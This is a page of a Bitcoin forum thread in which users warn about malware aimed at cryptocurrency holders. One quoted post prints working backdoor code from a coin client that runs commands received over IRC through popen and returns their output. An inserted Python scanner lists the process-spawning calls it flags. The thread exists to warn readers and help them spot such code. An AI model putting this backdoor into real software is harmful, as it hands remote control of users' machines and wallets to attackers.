Bitcoin Forum
October 21, 2019, 03:43:29 AM *
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 164277 times)
CryptoRyuzaki
Newbie
*
Offline Offline

Activity: 51
Merit: 0


View Profile WWW
February 21, 2018, 01:17:06 AM
 #461

Thanks for sharing the different malware attack/attempts. One needs to be extra vigilant whenever clicking on any unknown links and have the anti-virus software up to date. These two primary items will help you more than 90% of the time to avoid any infections.
bedford1972
Jr. Member
*
Offline Offline

Activity: 266
Merit: 2


View Profile
February 21, 2018, 10:39:50 PM
 #462

Good post, very cognitive. But I would add here recommendations on how to minimize the risks of infection. For example, create a separate computer for work on the network and a separate one for wallets. This will help at least keep the funds stored for a long time. I will also recommend using the Tabsbook program, in which you can save frequently used links and go only to them, since attackers often use official resources and make phishing sites. There are a bunch of other recommendations that I advise you to study before you start working with a cryptocurrency.

sportcoins
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile
February 23, 2018, 04:38:47 AM
 #463

Thanks for the information. We hate Malware!
hashcoinusa
Member
**
Offline Offline

Activity: 344
Merit: 10


View Profile
February 26, 2018, 06:03:20 AM
 #464


We will never have the insight into the code.   

Don't install a wallet on your main computer. Create a virtual machine and limit your exposure.

robi5060
Newbie
*
Offline Offline

Activity: 68
Merit: 0


View Profile
February 26, 2018, 02:57:41 PM
 #465

Can anyone please tell me about what coins are affected by sophisticated attacks/malware?
Nanoverso
Jr. Member
*
Offline Offline

Activity: 81
Merit: 1


View Profile WWW
February 26, 2018, 11:24:41 PM
Last edit: May 16, 2019, 04:50:20 AM by Nanoverso
 #466

Is there some information on whether these malware infection attempts are affecting other systems beyond Windows, like Mac or Linux?

Checkout my Mario blog (Portuguese): Jogos do Mario Bros.
Dandidada
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
February 28, 2018, 08:18:18 AM
 #467

Thank y'all for the enlightenment. It's very much appreciated, knowing full well there are lots of hackers trying to get easy cryptocurrency.
prsharma
Newbie
*
Offline Offline

Activity: 33
Merit: 0


View Profile
February 28, 2018, 09:54:48 AM
 #468

Very useful information for me, I never thought in mind that attackers might attack on this forum and post some malicious content here.
Thanks for the info, I will be cautious about content and links before clicking on them.
Motookerva
Newbie
*
Offline Offline

Activity: 63
Merit: 0


View Profile
March 01, 2018, 06:46:55 PM
 #469

I am a newbie and thanks for informing. I would like to ask how can we spot a scammer?
Marble777
Member
**
Offline Offline

Activity: 479
Merit: 10

The World's 1st Waste to Green Energy DLT Project


View Profile
March 01, 2018, 10:12:06 PM
 #470

Quote from: prsharma on February 28, 2018, 09:54:48 AM
Very useful information for me, I never thought in mind that attackers might attack on this forum and post some malicious content here.
Thanks for the info, I will be cautious about content and links before clicking on them.

It applies also to me because I am a beginner, so I do not understand this forum and sometimes feel paranoid when I hear there are many cases of phishing, but after reading the above information I really understand and am sure that this forum is safe from hackers.

seggardinggins
Full Member
***
Offline Offline

Activity: 630
Merit: 100



View Profile
March 02, 2018, 09:34:02 PM
 #471

Quote:
Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

Maybe so, but as much as possible all the tools that are used should be used only for this purpose. In my opinion it would be too risky if the tool we use to open the wallet is also used for other purposes such as games and downloading mp3s or videos, because we all know that there is a lot of malware in most download links.

jaydoes6
Newbie
*
Offline Offline

Activity: 24
Merit: 0


View Profile
March 03, 2018, 05:32:27 AM
 #472

Can't you give anything new? It has been prevailing from very old times in btcs.
gng
Newbie
*
Offline Offline

Activity: 210
Merit: 0


View Profile
March 03, 2018, 07:56:14 AM
 #473

You think faucet sites send malware?
AutumnSphinx
Newbie
*
Offline Offline

Activity: 4
Merit: 0


View Profile
March 03, 2018, 11:18:29 PM
 #474

This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.
Ant112990
Newbie
*
Offline Offline

Activity: 21
Merit: 0


View Profile
March 04, 2018, 04:29:50 AM
 #475

Quote:
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
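// Backdoor trigger: an IRC PRIVMSG whose fourth word is ":!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The rest of the IRC line, from the fifth word on, is passed to popen() as a command
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        // Collect the command's output
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Take the sender's nick from the message prefix (text before '!')
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the output back to that nick as a PRIVMSG
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}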
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Don't forget airship registration, asking for private keys.. I sent them mones and luckily found out immediately after I sent it.. and moved my coin out of the wallet and created a new wallet.
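A review aid for the macro-hidden popen call quoted in the post above, added here as an example and not part of the original post or of any coin's source: it resolves `#define` aliases and reports every line where a process-spawning function is reached directly or through a macro. The `#define` lines in the sample are constructed (the post shows only the call site and its resolved form), and the names `find_aliases`, `scan` and the `DANGEROUS` list are assumptions of this sketch.

```python
import re

# Calls that start a shell or process; aliasing one behind a macro hides it from a plain grep.
DANGEROUS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp", "WinExec"}
DEFINE_RE = re.compile(r'^[ \t]*#[ \t]*define[ \t]+(\w+)(?:\([^)]*\))?[ \t]+(.+)$', re.M)
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')   # string literals, blanked before matching
IDENT_RE = re.compile(r'\b[A-Za-z_]\w*\b')

def find_aliases(source):
    """Return {macro: dangerous_function}, following chains such as A -> B -> popen."""
    macros = {m.group(1): STRING_RE.sub('""', m.group(2)) for m in DEFINE_RE.finditer(source)}
    aliases, changed = {}, True
    while changed:                              # repeat until no new alias is found
        changed = False
        for name, body in macros.items():
            if name in aliases:
                continue
            for ident in IDENT_RE.findall(body):
                target = ident if ident in DANGEROUS else aliases.get(ident)
                if target:
                    aliases[name] = target
                    changed = True
                    break
    return aliases

def scan(source):
    """Return (line_number, identifier, resolved_function) for each direct or aliased use."""
    aliases = find_aliases(source)
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):       # skip the definitions themselves
            continue
        for ident in IDENT_RE.findall(STRING_RE.sub('""', line)):
            target = ident if ident in DANGEROUS else aliases.get(ident)
            if target:
                hits.append((lineno, ident, target))
    return hits

# Constructed sample: the #define lines are assumed; line 5 is the call quoted in the post.
SAMPLE = '''#define CLine FILE
#define CRead popen
#define CBuff "PRIVMSG"
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
'''

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("line %d: %s resolves to %s" % hit)
```

A hit is a prompt for manual review, not a verdict: legitimate code also calls these functions, and the scan does not follow macros defined in headers it was not given.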
bekhuong45
Newbie
*
Offline Offline

Activity: 126
Merit: 0


View Profile
March 04, 2018, 10:32:03 AM
 #476

We need to say thanks to you.. :) clap clap
Magister Magus
Member
**
Offline Offline

Activity: 329
Merit: 35


View Profile
March 04, 2018, 10:44:19 AM
 #477

Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed :(

Your post made me think in a paranoid way, and I just wondered if we can really trust antimalware software: how can we be sure that THEY don't put something malicious, or don't scan for private keys?

It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.

rammanbl4
Full Member
***
Offline Offline

Activity: 252
Merit: 100



View Profile
March 04, 2018, 03:35:43 PM
 #478

This is terrible, I really thank you, because I almost got caught, and now I am starting to install Adblock; I hope to block all the malware from online websites.
redshiftexpensive
Newbie
*
Offline Offline

Activity: 69
Merit: 0


View Profile
March 05, 2018, 03:11:51 AM
 #479

Yes I was totally aware of it
cp3mc
Newbie
*
Offline Offline

Activity: 34
Merit: 0


View Profile
March 05, 2018, 11:19:46 AM
 #480

I was thinking if there is a way to automatically delete any malware link post on this forum so that we may not even get to open the link.